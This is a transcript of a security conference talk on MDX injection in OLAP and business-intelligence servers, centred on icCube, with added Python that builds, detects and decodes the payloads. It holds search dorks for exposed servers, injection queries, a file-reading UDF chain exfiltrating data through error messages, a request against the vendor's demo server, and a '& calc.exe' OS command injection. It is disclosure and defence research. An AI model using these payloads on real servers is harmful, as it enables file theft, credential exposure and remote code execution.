BI hacking – Breaking ICCube
Dmitry Chastukhin – Director of SAP pentest/research team, ERPScan
Invest in security to secure investments


Transcript of BI hacking – Breaking ICCube Dmitry Chastukhin – Director of SAP pentest /research team


BI hacking – Breaking ICCube
Dmitry Chastukhin, Director of SAP pentest/research team

Hi. My name is Dmitry Chastukhin, and this is my colleague Alexander. We work at ERPScan. Today we will tell you about OLAP and MDX technology, and how an attacker can compromise critical data using these technologies.

Dmitry "chipik" Chastukhin
Business application security expert
Yet another security researcher
I hate the words "kuluary" (the conference hallway) and "colleagues".

I work in the field of information security and, in particular, business application security. What's more, my friends and I are the organizers of a hardcore security conference in Russia: ZeroNights.

OLAP & Big Data
Let's talk about what OLAP and Big Data are.

WTH is OLAP?
Online analytical processing (OLAP) is an approach to formulate and answer multidimensional queries to large datasets.
OLAP technologies have been developed by many software giants since the 1990s.
Business intelligence (BI) is a methodology that helps managers in the analysis of information inside and outside the company.
OLAP is all about BI and Big Data.

Online analytical processing (OLAP) is an approach to formulate and answer multidimensional queries to large datasets. And when I say large here, I mean really large datasets. OLAP technologies have been developed by many software giants since the 1990s. OLAP and Business Intelligence were initially developed to help top and middle level executives analyze information about processes and data inside and outside the company. OLAP is all about BI and Big Data.

Usage areas

After first appearing in the 2000s, the use of Big Data technologies gradually expanded to several fields where analysis and decision making is based on large datasets. Now, the most popular fields to use OLAP and Big Data are: advertising, healthcare, energy, government and retail.

Main players of OLAP industry

On this slide you can see the main players of the OLAP industry: Microsoft with Microsoft Analysis Services, SAP with SAP NetWeaver BW, SAS OLAP Server, IBM Cognos TM1, the open source icCube solution, Essbase and the OLAP add-on from Oracle, and others.

Google dork
Many of these servers can be accessed directly from the Web; here are some dorks:

Service                                      Dork
Pentaho Business Analytics XMLA interface    inurl:/mondrian/testpage.jsp   inurl:/pentaho/testpage.jsp
Pentaho Business Analytics                   intitle:"Pentaho User Console - Login"
ISAPI MS Analysis Services                   inurl:msmdpump.dll
SAP NetWeaver                                inurl:/sap/bc/bsp
Oracle Essbase                               intitle:"Hyperion System 9" inurl:asp

A quick glance
And here they are:

Basic entities
Simple table with the columns: Date, Country, City, Customer, Supplier, Product, Totals, Route
What if we need to get totals by countries and suppliers vs. cities? Can we really do it in 2D?

So, why OLAP? Imagine that you have a large dataset about the supply of goods, structured in a simple table, as shown on the slide. What if the company's manager needs to get consolidated data about supplies ranged by country, city and supplier? Can it really be imagined in 2D, which is usually used in OLTP? What will happen if we also need the information requested above vs. customers or routes?

So what? We're in N dimensions!

OK, we are now in 4 (or more) dimensions. Welcome to the OLAP and MDX world. Looks crazy, eh?

Cube will help!

And now the cube idea will help. The data is presented as a three-dimensional (or more, n-dimensional) structure. For example, this picture shows a cube which is created in accordance with the data from the previous slide. It is actually four-dimensional: I am sorry, but I am not very good at drawing hypercubes.

MDX
Let's talk about the language that allows us to make queries to such cubes.

WTH is MDX?
SQL isn't convenient to access Big Data.
MDX (MultiDimensional eXpressions) comes to replace it.

MDX looks like SQL, but it's not SQL:
(usually) you can't modify data
MDX is much stricter than SQL

What is MDX? OLAP stands far from OLTP, so using OLTP languages (such as SQL) isn't convenient for accessing Big Data. Moreover, SQL is a very hard language. So, MDX was created to replace SQL in this area. You might remember that SQL was not originally intended for programmers. MDX, too, was not created for programmers but rather for managers and analysts. Ironically, in the course of time, MDX became even more complex than SQL. At first look, MDX appears to be similar to SQL, but that's wrong. There are (at least) two main differences between MDX and SQL: 1) MDX is much stricter than SQL and 2) usually you can't modify data. I've said "usually", because in some cases you can. But we will talk about it later.

MDX query form

[ WITH <SELECT WITH clause> [ , <SELECT WITH clause> ...n ] ]
SELECT [ * | ( <SELECT query axis clause> [ , <SELECT query axis clause> ...n ] ) ]
FROM <SELECT subcube clause>
[ <SELECT slicer axis clause> ] [ <SELECT cell property list clause> ]

This slide shows the standard layout of a SELECT query in MDX. Like in SQL, SELECT is used in MDX to retrieve a sample of data. It does look slightly like SQL, doesn't it? The query starts with the WITH section, which can define measures, objects and members to be used in the rest of the query. After that, the SELECT section defines which dimensions of the cube will be used in the resulting sample. And finally, the FROM section defines which cube (or subcube created by a subquery) the data is to be retrieved from. It also defines filters and slicers.

MDX SELECT query sample

WITH
MEMBER SelectedMeasure AS ([Measures].[Salary Paid])
SELECT { [SelectedMeasure] } ON COLUMNS,
{ ([Employee].[Department].[Department].[HQ Marketing], [Gender].[Gender].[M]) } ON ROWS
FROM [HR]
WHERE ([Store].[Store].AllMembers)

You can see a sample MDX query on this slide. This query will extract information about the paid salary (in the first dimension) against male employees from the marketing department. Here, a new simple measure was defined in the WITH section. In practice, measures can be more complex and even include subqueries in some cases. The first dimension of results is defined by ON COLUMNS, and the second by ON ROWS. You can also use ON 1, ON 2, etc. The data is queried from the cube called HR, and the widest filter is selected: All Members of Store.

MDX Processing

[Diagram: Application sends MDX to the OLAP server; the OLAP server passes mdXML to OLTP; OLTP answers from its data (SQL?)]

OK, we've written an MDX query. How will it be processed in Big Data systems? As was mentioned earlier, in the most common case, OLAP is based on OLTP. When you write an MDX query and send it to the OLAP server, it's picked up by the MDX analyzer/interpreter. It converts the MDX query into an mdXML query (we will talk about XML for Analysis later) and sends it to OLTP. OLTP can process the query directly or convert it into a set of SQL (or NoSQL) queries. The resulting data is gathered and sent back to the application. Many OLAP servers work in the way depicted on the slide.

Attacks on MDX

Now we know enough to plan how we can attack MDX. Imagine that we have a vulnerable application that fails to filter user input and processes it directly into some parts of an MDX query. What are the vectors? We can attack mdXML with good old XXE injections and other XML attacks. We can use pure MDX injections to gather (or even modify!) sensitive data that was not supposed to be accessible by the vulnerable application. Also, we can use MDX extensions, user-defined functions, to expand the attack and even get RCE on the vulnerable system.

MDX Injections
Let's talk about how to inject.

What will help to inject?
Comments: single line -- (as in SQL); multiline /* */
Special functions for crawling dimensions and members: Parent, FirstChild, LastChild, DefaultMember, etc.
Subqueries in FROM ( )

What language features will help us in MDX injections? In MDX, like in SQL, there are two types of comments: single line (dash dash) and multiline (slash asterisk). Also, we can use subqueries to create subcubes in the FROM part of the query. There are several built-in functions that work in many dialects of MDX, and with these functions we can crawl dimensions and reverse-engineer the cube structure: Parent, DefaultMember, FirstChild, etc.

Where to inject?

WITH
MEMBER SelectedMeasure AS ([Measures].[Salary Paid])                                          <-- here
SELECT { [SelectedMeasure] } ON COLUMNS,
{ ([Employee].[Department].[Department].[HQ Marketing], [Gender].[Gender].[M]) } ON ROWS      <-- here
FROM [HR]
WHERE ([Store].[Store].AllMembers)                                                            <-- here

MDX injections aren't the same as SQL injections. In SQL, in most cases, we inject into the WHERE part of the query. In MDX, due to the language specifics, the application can insert user input into three different parts of the query, as shown on the slide: into the member definition, into the dimension specification and into the WHERE filter or slicer.

Types of injections

So, we have three possible types of MDX injections with possible results. If we are able to inject into the Pre-SELECT section, we can do almost everything (with the exception of data modification); if we can inject into the SELECT section, we can gain partial information about the cube metadata, gain access to unexpected and confidential data, and also access other cubes. In the WHERE section, you can only use blind MDX injections. And of course, you can call user-defined functions in each of these sections.

Pre-SELECT injection

WITH
MEMBER SelectedMeasure AS ([Measures].[Salary Paid])
MEMBER [Rank] AS (Rank([Employee].[Employee].currentmember, Head([Employee].[Employee].members, Dimensions.count-1)))
MEMBER HierName AS ( Dimensions([Rank]).uniquename )
SELECT
{[Rank], [HierName]} on 0,
{Head([Employee].[Employee].members, Dimensions.count-1)} on 1
FROM [HR]
/* [Salary Paid]) SELECT { [SelectedMeasure] ...rest of query...

Here is an example of MDX injection into the Pre-SELECT section. On the slide, the injected code is highlighted in red and the commented-out rest of the query in green. Here, we inject code that will return almost all members of the cube hierarchy. We're using special built-in keywords of MDX, such as Dimensions.count, uniquename, currentmember and members, which will allow us to access cube hierarchy metadata.

In-SELECT injection

WITH
MEMBER SelectedMeasure AS ([Measures].[Salary Paid])
SELECT { [SelectedMeasure] } ON COLUMNS,
{ ([Employee].[Department].[Department].[HQ Marketing], [Gender].[Gender].AllMembers, [User name].[User name].AllMembers) } ON ROWS
FROM [HR]
WHERE ([Store].[Store].AllMembers) /* [M]) } ... rest of request ...

Another example describes the situation where we can only inject into the dimension specification in the SELECT part of the query. As you remember, in the original query, the application specified (for example, with a combobox) the gender of an employee. If we can inject into the query through the value of this hypothetical combobox, we can slightly modify the query so it will return not only the employees' salaries, but also their system usernames or (possibly) passwords (if they remain in the cube). This is not a rare case: often, cubes are created semi-automatically based on OLTP datasets, so passwords can still remain in OLAP data too.

MDX Tips & Tricks (1)

Let's talk a bit about some cool features of MDX that will help us in the process of injecting queries. First, as in many SQL dialects, you can start a multiline comment with slash-asterisk and you don't need to end it; the rest of the query text stays commented out till its end. Also, you can use {null} on one of the axes/dimensions to get all data from the other dimensions in the query. For getting cube metadata, you can use the Dimensions keyword, and the DESCENDANTS function will give you all data about a member of the cube. Also, with LOOKUPCUBE you can access neighbor cubes (of course, if the OLAP MDX user can access them). And important string functions (such as StrToSet and SetToStr) will help you to encode and pass data within the query.

Modifying data with MDX

Normally, you can't modify data with MDX:
MDX was created for data extraction, not modification.
ALTER, CREATE and DROP are used for operations with measures and temporary sets, not for changing cube data.

But in rare cases, you can modify data with UPDATE statement.
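Before moving on to data modification, here is the in-SELECT injection from a few slides back in running code. This is an added example, not the speakers' code: it models a hypothetical application that splices a combobox value into the HR query shown on the slides, puts an allow-listed and bracket-escaped builder next to it, and extracts which hierarchies each resulting query references so the effect of the payload is visible without an OLAP server. The allow-list, the helper names and the "]]" escape rule (the Analysis Services convention for a literal "]" inside a delimited identifier) are assumptions about the target server, not something the talk states.

```python
import re

# Added example (not from the slides, not icCube code). It models an
# application that builds the HR query from the slides and splices a
# combobox value into the dimension specification on the ROWS axis,
# which is the "in-SELECT" injection point described in the talk.

# %s stands for the whole delimited member identifier, e.g. [M].
TEMPLATE = (
    "WITH MEMBER SelectedMeasure AS ([Measures].[Salary Paid]) "
    "SELECT { [SelectedMeasure] } ON COLUMNS, "
    "{ ([Employee].[Department].[Department].[HQ Marketing], "
    "[Gender].[Gender].%s) } ON ROWS "
    "FROM [HR] WHERE ([Store].[Store].AllMembers)"
)

# Members the combobox legitimately offers (constructed allow-list).
GENDER_MEMBERS = {"M", "F"}

# Payload in the spirit of the in-SELECT slide: close the tuple, pull in a
# second hierarchy, finish the query, and comment out the application's
# own tail with an unterminated /* (the parser tolerates an unclosed one).
PAYLOAD = (
    "M], [User name].[User name].AllMembers) } ON ROWS "
    "FROM [HR] WHERE ([Store].[Store].AllMembers) /*"
)


def build_query_vulnerable(gender: str) -> str:
    """Plain concatenation: the client's bytes become MDX syntax."""
    return TEMPLATE % ("[" + gender + "]")


def quote_member(name: str) -> str:
    """Delimited identifier. In Analysis Services MDX a literal ']' inside
    a bracketed name is written ']]'; assumed here to hold for the server
    in use, so the value can never close the bracket it sits in."""
    return "[" + name.replace("]", "]]") + "]"


def build_query_hardened(gender: str) -> str:
    """Allow-list first; quoting is the fallback for free-form values."""
    if gender not in GENDER_MEMBERS:
        raise ValueError("unexpected member value: %r" % gender)
    return TEMPLATE % quote_member(gender)


def build_query_quoted_only(value: str) -> str:
    """Quoting without an allow-list: the payload survives as one bogus
    member name instead of becoming query structure."""
    return TEMPLATE % quote_member(value)


# [A].[B] pairs, i.e. hierarchies the query text references.
HIER_RE = re.compile(r"\[([^\[\]]+)\]\.\[([^\[\]]+)\]")
# A delimited identifier, honouring the ]] escape.
IDENT_RE = re.compile(r"\[(?:[^\]]|\]\])*\]")


def hierarchies_in(query: str) -> set:
    """Which hierarchies the query pulls in; shows what the injected
    query would actually select."""
    return {"[%s].[%s]" % m for m in HIER_RE.findall(query)}


def has_unterminated_comment(query: str) -> bool:
    """More /* openers than */ closers outside identifiers: the trick the
    payload relies on to discard the application's tail."""
    code = IDENT_RE.sub("", query)
    return code.count("/*") > code.count("*/")


if __name__ == "__main__":
    vuln = build_query_vulnerable(PAYLOAD)
    print(vuln)
    print(sorted(hierarchies_in(vuln)))
    print(build_query_quoted_only(PAYLOAD))
```

The allow-list is the control that matters; the escaping only keeps a free-form value inside its brackets and does nothing about a value the application should never have accepted in the first place.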

MDX isn't SQL, and normally you can't modify data with MDX. MDX statements like ALTER, CREATE and DROP are designed for creating/deleting/altering measures and temporary sets, but not for changing cube data. But in rare cases, you can modify data with the UPDATE statement.

MDX Update Query
Simple update query:

UPDATE CUBE [Sales] SET ([Geography].[Geo].[Europe], [Measures].[Amount]) = 20

So, if you can control the whole query AND data modification in the cube is enabled, you can modify data in any cube that you have permissions to access.

Here is the simplest UPDATE query, where the Sales amount for the Europe region is set to 20. The worst thing about UPDATE is that it can't be a subquery and can't start with a WITH statement. So you can inject data modification statements only if two conditions are true: 1) you control the WHOLE query and 2) data modification is enabled for your user.

MDX UDF

Okay, let's talk about another feature of the MDX query language: user-defined functions.

User-Defined Function
User-Defined Functions (UDF) are functions written by the user or a third-party developer which can take and return values in the MDX syntax.

ProgramID!FunctionName(Argument1, Argument2, ...)

User-Defined Functions (UDF) are functions written by the user or a third-party developer which can take and return values in the MDX syntax. So a developer can use them to enhance the functions of the language and the application which uses it. To call a UDF, this kind of construct must be used in a query: ProgramID!FunctionName(Argument1, Argument2, ...)

Attack on UDF. icCube OLAP Server

icCube OLAP Server
Popular OLAP server
Free. Has a Community edition
Cross-platform Java app: Windows, Linux
Fast
Has many utilities: IDE, web reports, etc.

We will now discuss some attacks on OLAP servers where user-defined functions are used. icCube OLAP Server will be the object of these attacks. Why? First, it is quite a popular solution for OLAP servers. Second, it has a free community edition. Third, this solution is cross-platform because it is written in Java. The developers claim it to be fast, reliable and secure. Another advantage of this software is that it is shipped with a lot of additional utilities for developing and debugging queries, creating web reports and so on.

icCube OLAP Server

To sum up, the availability of this solution is why we have chosen it.

icCube OLAP Server

This is how working with an OLAP server looks for the end user. Fancy HTML5, diagrams and checkboxes allow working with multi-dimensional data conveniently and generating queries easily.

icCube OLAP Server
Of course icCube uses MDX, but where?
Send some request in WebReport, and look in Burp.

And this is how the client working with OLAP looks for anyone who looks into a sniffer. Of course, MDX is the appropriate language to be used in queries, but that is not the surprising part. Can you see the mdx parameter in the POST request? It contains the whole MDX query!

icCube OLAP Server

POST /icCube/gvi

action=executeMdx&mdx=SELECT { {[Measures].[Cashflow (M)],[Measures].[Cumulative Cashflow (M)]} } ON COLUMNS,
{ [Calendar].[Calendar].[Quarter].allmembers } ON ROWS
FROM ( SELECT { {[Product Type].[Product Type].[Product Type-L].&[Fixed Income I], [Product Type].[Product Type].[Product Type-L].&[Fixed Income II], [Product Type].[Product Type].[Product Type-L].&[Saving Account], [Product Type].[Product Type].[Product Type-L].&[Fixed Income Derivative I], [Product Type].[Product Type].[Product Type-L].&[Fixed Income Derivative II], [Product Type].[Product Type].[Product Type-L].&[Other]} } ON 0,
{ {[Currency].[Currency].[Currency-L].&[121], [Currency].[Currency].[Currency-L].&[114], [Currency].[Currency].[Currency-L].&[119], [Currency].[Currency].[Currency-L].&[115], [Currency].[Currency].[Currency-L].&[133], [Currency].[Currency].[Currency-L].&[130], [Currency].[Currency].[Currency-L].&[122], [Currency].[Currency].[Currency-L].&[128], [Currency].[Currency].[Currency-L].&[124], [Currency].[Currency].[Currency-L].&[125], [Currency].[Currency].[Currency-L].&[123], [Currency].[Currency].[Currency-L].&[118], [Currency].[Currency].[Currency-L].&[126], [Currency].[Currency].[Currency-L].&[131], [Currency].[Currency].[Currency-L].&[116], [Currency].[Currency].[Currency-L].&[117], [Currency].[Currency].[Currency-L].&[132], [Currency].[Currency].[Currency-L].&[127], [Currency].[Currency].[Currency-L].&[120]} } ON 1,
{ {[Interest/Principal].[Interest/Principal].[Interest/Principal-L].&[1], [Interest/Principal].[Interest/Principal].[Interest/Principal-L].&[2], [Interest/Principal].[Interest/Principal].[Interest/Principal-L].&[3]} } ON 2,
{ {[Profit Unit].[Profit Unit].[Profit Unit-L1].&[-], [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Corporate], [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Debt], [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Funding], [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Investments], [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Special Purpose]} } ON 3
FROM [Cube])&schema=Bank I&tqx=out:json

It means that the attacker need not bother with searching for injection parameters and bypassing filters. They just need to understand which cubes, measures, axes and members are there and compose the correct query. However, we are interested in user-defined functions right now.

icCube OLAP Server
Try to use user-defined functions
As we remember, icCube is a Java application
Let's try Java functions

J!Math.PI

So icCube is a Java application. Well then, maybe Java functions will serve as UDF? Let's try to call Math.PI using the common entry format: J!Math.PI

icCube OLAP Server

You can see the full entry on the slide as well as the result: the server has successfully replied with the value of Pi.

icCube OLAP Server
Probably, we can call public static Java functions. Cool.

J!System.getProperty("user.dir")

Rejoice! Looks like we can call public static Java functions. Let's try the obvious: System.getProperty(). Aaaaand here is the part where we fail: an unknown method error.

icCube OLAP Server
icCube developers restrict access from user-defined functions to dangerous Java functions
"From MDX, we can use some Java classes like Math, and if you need Java classes from a JAR that are not available with icCube, simply add them to the icCube-install/lib directory" (c) www.iccube.com

We tried a couple more cheesy functions and concluded that the developers had restricted access for MDX to all dangerous methods and functions and left just boring classes like Math. However, the official documentation contains a subtle hint that much more than Math is possible if you add the desired classes to the server directory called lib.

icCube OLAP Server
The icCube-install/lib directory contains a lot of interesting .jar files with interesting functions, which we can call

For example: org.apache.commons.io.FileUtils.readFileToString(File file)

from commons-io-1.4.jar

It was only logical to have a look at the JAR files which were already contained in the directory, decompile them and find something interesting. I can tell you outright that it was not hard to find. For example, commons-io-1.4.jar contained a method to read files from the OLAP server.

UDF. icCube OLAP Server
Let's try to read the file c:\111.txt from the server, which contains the text: hello_MDX
To get the data out, we can use error messages:

J!org.apache.commons.io.FileUtils.readFileToString(J!File("c:/111.txt"))

Final MDX request

SELECT {StrToTuple(J!org.apache.commons.io.FileUtils.readFileToString(J!File("c:/111.txt")))} ON COLUMNS FROM [Sales]

Okay, let's try to read a file called 111.txt which contains the text "hello_MDX". The text has to be displayed somewhere, so we will cause a wrong dimension name error. The slide shows the final file read query.

UDF. icCube OLAP Server

This slide shows the result of our work. You can see that the server returned an error which contained the file content.

UDF. icCube OLAP Server
But if the file contains special characters or even whitespace, the MDX parser won't return its content
For example, if we try to read the file "hello_MDX blabla", we will get this error: syntax error: unexpected statement 'blabla' (REGULAR_IDENTIFIER)

But we did not manage to read anything interesting from the server. Special characters, commas and even spaces crashed the MDX parser and only part of the file was transferred from the server. For example, if we try to read the file "hello_MDX blabla", we will get this error: syntax error: unexpected statement 'blabla' (REGULAR_IDENTIFIER)

UDF. icCube OLAP Server
Ok. Just encode the file content. Base64, for example
We found a method org.apache.commons.codec.binary.Base64.encodeBase64(byte[] binaryData) in the file commons-codec-1.6.jar, tried it and got the error:

syntax error: unexpected statement 'EQ'

The solution is obvious: encode the file content with base64. By the way, commons-codec-1.6.jar happens to have a relevant method. Add this method to the query, send it, and here is failure again: syntax error: unexpected statement 'EQ'.

UDF. icCube OLAP Server
Hmm, probably the Base64 string contained an EQ sequence, which means "equivalent"
Ok, encoded the file content twice and got the error: syntax error: missing expression following '='

The Base64 string probably contained an EQ sequence, which means "equivalent" in MDX. Ok, encoded the file content twice and got another error. The parser returned an error about a missing expression after the equal operator, because this symbol is frequent at the end of base64 strings.

UDF. icCube OLAP Server
Oh, the = symbol is often found at the end of a Base64 string
To resolve this problem, just concatenate the Base64 string which contains = with one letter: MTIzNDU=s
When the MDX parser works, it drops = and all symbols after that. But = is always at the end of Base64, so we can still decode it.

To resolve this problem, just concatenate the Base64 string which contains = with one letter, and the expression will be correct. When the MDX parser works, it drops = and all symbols after that. But we know the equal symbol is always at the end of Base64, if anywhere, so we can still decode it.

UDF. icCube OLAP Server
Final user-defined function call:

StrToTuple(J!org.apache.commons.codec.binary.Base64.encodeBase64(J!org.apache.commons.codec.binary.Base64.encodeBase64(J!org.apache.commons.io.FileUtils.readFileToByteArray(J!File("c:/111.txt"))))+"s")

This is our final user-defined function call which allows reading any file from the OLAP server.

UDF. icCube OLAP Server

Decode WVVkV2MySkhPV1pVVlZKWlNVZEtjMVpYU25OWlVUMDk=

The server replies with an error which contains a base64 string. We must not forget to add an equal sign at the end.

UDF. icCube OLAP Server
We must not forget to add = at the end of the Base64 string because the MDX parser has trimmed it
After decoding, we got the text from the file c:\111.txt

Decode the string several times and get the contents of the file at the OLAP server.

UDF. icCube OLAP Server
This vulnerability is very interesting, especially because users' passwords in icCube OLAP Server are stored as Base64 encoded strings in the file icCubeUsers.icc-users

[Excerpt from icCubeUsers.icc-users, markup stripped: administrator standard standard administrator]

This vulnerability is very interesting, especially because user passwords in icCube OLAP Server are stored as Base64 encoded strings in a configuration file. It is the year 2013, and applications still store passwords in plaintext.

UDF. icCube OLAP Server
Example: getting the user home directory from the icCube demo server demo3.iccube.com

POST /icCube/gvi HTTP/1.1
Host: demo3.iccube.com

action=executeMdx&mdx=SELECT{StrToTuple(J!crazydev.common.security.Base64Encoder.encodeString(J!crazydev.common.utils.CdSystemUtils.getStringProperty("user.home","aaa"))%2b"ss")}+ON+COLUMNS,{[Calendar].[Calendar].allmembers+}+ON+ROWS+FROM+[Cube]&schema=Bank+I&tqx=out%3Ajson

Just before BlackHat, icCube shut down those methods, but the mechanism of calling those functions is flawed by nature and can be successfully exploited with the help of other critical methods. For example, let's try retrieving the user home directory where the official icCube demo server is launched from. We will use the methods crazydev.common.utils.CdSystemUtils.getStringProperty() and crazydev.common.security.Base64Encoder.encodeString(), which still work.

UDF. icCube OLAP Server

HTTP/1.1 200 OK

{version:'0.6',status:'error',errors:[{reason:'other',message:'\u0027\u0027L2hvbWUvZGVtbzM\u0027 is neither a dimension nor a hierarchy within the cube.\u0027 is neither a dimension nor a hierarchy within the cube.',detailed_message:'SELECT{StrToTuple(J!crazydev.common.security.Base64Encoder.encodeString(J!crazydev.common.utils.CdSystemUtils.getStringProperty(\u0022user.home\u0022,\u0022aaa\u0022))+\u0022ss\u0022)} ON COLUMNS,\r\n{[Calendar].[Calendar].allmembers } ON ROWS\r\n FROM [Cube]\r\n',error_code:'OLAP_UNKNOWN_DIMENSION_HIERARCHY'}]}

After decoding L2hvbWUvZGVtbzM=, we get /home/demo3

Again, the same error with a base64 string. After decoding it, we get the necessary information: "/home/demo3".
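The base64 detour and the decoding it forces on the attacker, as an added example that is not part of the talk and not icCube code. It builds the final UDF call string for a path, simulates the parser behaviour the speakers observed (the echoed identifier is cut at the first "="), restores the padding, peels the base64 layers, and pulls the token out of an OLAP_UNKNOWN_DIMENSION_HIERARCHY message shaped like the demo3 response above. The handling of the marker letter when the outer encoding has no "=" to cut at is my generalisation of the slides' +"s" trick; the sample error text is constructed from the response above, and nothing here sends a request anywhere.

```python
import base64
import binascii
import re
import string

# Added example; not the speakers' code and not icCube code.

B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
ERROR_RE = re.compile(r"'([A-Za-z0-9+/=]+)' is neither a dimension nor a hierarchy")


def udf_payload(path: str, marker: str = "s") -> str:
    """The final call shape from the slides: double base64 plus a trailing
    letter so the parser has an expression after '='. Only builds the
    string."""
    read = 'J!org.apache.commons.io.FileUtils.readFileToByteArray(J!File("%s"))' % path
    enc = "J!org.apache.commons.codec.binary.Base64.encodeBase64"
    return 'StrToTuple(%s(%s(%s))+"%s")' % (enc, enc, read, marker)


def server_side_view(file_bytes: bytes, marker: str = "s") -> str:
    """Simulates what the talk observed: the double-encoded value plus the
    marker is parsed as an identifier, and the parser drops '=' and all
    that follows before echoing the name in the error message."""
    doubled = base64.b64encode(base64.b64encode(file_bytes)).decode("ascii")
    return (doubled + marker).split("=", 1)[0]


def strip_marker(token: str, marker: str = "s") -> str:
    """A single-letter marker survives only when the outer encoding had no
    '=' to cut at; the length is then 1 mod 4, impossible for base64."""
    if len(marker) == 1 and len(token) % 4 == 1 and token.endswith(marker):
        return token[:-1]
    return token


def restore_padding(token: str) -> str:
    """Put back the '=' padding the parser trimmed."""
    token = token.rstrip("=")
    return token + "=" * (-len(token) % 4)


def decode_layers(token: str) -> list:
    """Decode repeatedly while the text still looks like base64 and still
    decodes to printable ASCII; returns each layer, innermost last."""
    layers = []
    current = strip_marker(token)
    while B64_TOKEN.match(current):
        try:
            raw = base64.b64decode(restore_padding(current), validate=True)
            text = raw.decode("ascii")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            break
        if not all(c in string.printable for c in text):
            break
        layers.append(text)
        current = text
    return layers


def extract_from_error(message: str) -> str:
    """Pull the echoed identifier out of an OLAP_UNKNOWN_DIMENSION_HIERARCHY
    message and return the innermost decoded layer."""
    m = ERROR_RE.search(message)
    if not m:
        raise ValueError("no echoed identifier in error message")
    layers = decode_layers(m.group(1))
    return layers[-1] if layers else m.group(1)


# Constructed sample: the message text from the demo3 response above.
SAMPLE_ERROR = ("''L2hvbWUvZGVtbzM' is neither a dimension nor a hierarchy within "
                "the cube.' is neither a dimension nor a hierarchy within the cube.")

if __name__ == "__main__":
    print(udf_payload("c:/111.txt"))
    echoed = server_side_view(b"hello_MDX blabla")
    print(echoed, "->", decode_layers(echoed))
    print(extract_from_error(SAMPLE_ERROR))
```

The stop condition in decode_layers matters: a plain path such as /home/demo3 happens to be valid base64 alphabet, so the loop only continues while the next layer also decodes to printable text, which is what keeps it from "decoding" the answer one step too far.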

icCube OLAP Server

DEMO
Now, a small demo

UDF. icCube OLAP Server
But dangerous Java methods are only half of the problem
Dangerous Java methods with bugs are another thing which the attacker can use
Method org.apache.commons.io.FileSystemUtils.freeSpaceWindows(String path) from commons-io-1.4.jar

But this is not the end of the adventures of user-defined functions. Calling dangerous methods is only half of the problem; the other half is the methods which contain certain vulnerabilities themselves. An example: there is a method called freeSpaceWindows which returns information about the hard drive space occupied by a certain directory. But look how it is implemented!

UDF. icCube OLAP Server
The variable path is used as a parameter in the command cmd.exe /C dir /-c path
The variable path isn't checked, that's why an attacker can inject operating system commands

That's the code of the user-defined function call which executes calc.exe on the server OS:

J!FileSystemUtils.freeSpace("& calc.exe")

OS command injection is self-evident here, because the path parameter is not checked in any way but rather just concatenated to the dir command. The code for calling the calculator is quite simple and elegant: J!FileSystemUtils.freeSpace("& calc.exe")
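A request-side check an analyst could run over /icCube/gvi form bodies, added here and not part of the talk or of icCube: it parses the mdx parameter, lists the J! references, flags an unterminated block comment and shell metacharacters inside string arguments, which between them cover the file-read, freeSpace and comment-truncation payloads shown above. The endpoint and parameter names are the ones the talk shows; the sample bodies are constructed from the requests on the slides, and the severity labels are my own.

```python
import re
from urllib.parse import parse_qs

# Added example; not icCube code and not from the talk.

UDF_REF = re.compile(r"J!([A-Za-z_][\w.]*)")   # J!pkg.Class.method or J!Class.FIELD
STRING_LIT = re.compile(r'"([^"]*)"')
SHELL_META = re.compile(r"[&|;`]")             # what cmd.exe /C would honour


def analyze_body(body: str) -> dict:
    """Inspect one application/x-www-form-urlencoded body sent to
    /icCube/gvi and report what its mdx parameter carries."""
    params = parse_qs(body, keep_blank_values=True)
    mdx = params.get("mdx", [""])[0]
    literals = STRING_LIT.findall(mdx)
    code = STRING_LIT.sub('""', mdx)  # judge structure without literal contents
    udf_refs = UDF_REF.findall(code)
    unterminated = code.count("/*") > code.count("*/")
    meta_args = [s for s in literals if SHELL_META.search(s)]
    return {
        "action": params.get("action", [""])[0],
        "udf_refs": udf_refs,
        "unterminated_comment": unterminated,
        "shell_meta_args": meta_args,
        "suspicious": bool(udf_refs) or unterminated,
    }


def triage(bodies: dict) -> dict:
    """Run analyze_body over a name -> body mapping."""
    return {name: analyze_body(body) for name, body in bodies.items()}


# Constructed sample bodies, modelled on the requests shown in the talk.
SAMPLE_BODIES = {
    "report": (
        "action=executeMdx&mdx=SELECT { [Measures].[Cashflow (M)] } ON COLUMNS, "
        "{ [Calendar].[Calendar].[Quarter].allmembers } ON ROWS FROM [Cube]"
        "&schema=Bank I&tqx=out:json"
    ),
    "file_read": (
        "action=executeMdx&mdx=SELECT{StrToTuple(J!org.apache.commons.io.FileUtils."
        'readFileToString(J!File("c:/111.txt")))} ON COLUMNS FROM [Sales]'
        "&schema=Sales&tqx=out:json"
    ),
    "cmd_inject": (
        'action=executeMdx&mdx=SELECT{StrToTuple(J!FileSystemUtils.freeSpace("%26 calc.exe"))} '
        "ON COLUMNS FROM [Sales]&schema=Sales&tqx=out:json"
    ),
    "comment_cut": (
        "action=executeMdx&mdx=SELECT { [Measures].[Cashflow (M)] } ON COLUMNS "
        "FROM [Cube] /* ON ROWS FROM [Cube]&schema=Bank I&tqx=out:json"
    ),
}

if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_BODIES).items():
        print(name, verdict)
```

Because the whole query travels in the request, this check is cheap to place in a reverse proxy or a WAF rule in front of the server; a J! reference in a body coming from the web-report client is a strong signal on its own, since the client's generated queries never need one.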

UDF. icCube OLAP Server

DEMO
Let me show you how it works

Conclusion
MDX is a very popular language
At this moment, we don't have an alternative language for multidimensional data requests
All developers forget about MDX security. Back to 2000
Security issues in MDX may cause a lot of attacks: data stealing, file reading, privilege escalation, remote code execution, SQL injection, cross site scripting, etc.

To sum up: MDX is a very popular language in business intelligence, and it is the main query language used to retrieve data from infocubes and OLAP servers as a whole. It does not have a decent alternative now. MDX resembles SQL a lot, but there are a lot of differences, both in semantics and in syntax. Moreover, the developers of business intelligence applications have forgotten about security for some reason: they send along all data sample queries without any filtering. Vulnerabilities and errors in MDX query processing can lead to dire consequences like data stealing, file reading, privilege escalation, arbitrary server-side code execution, and various SQL and JavaScript code injections.

Web: www.erpscan.com
e-mail: [email protected]
Twitter: @erpscan, @_chipik, @dark_k3y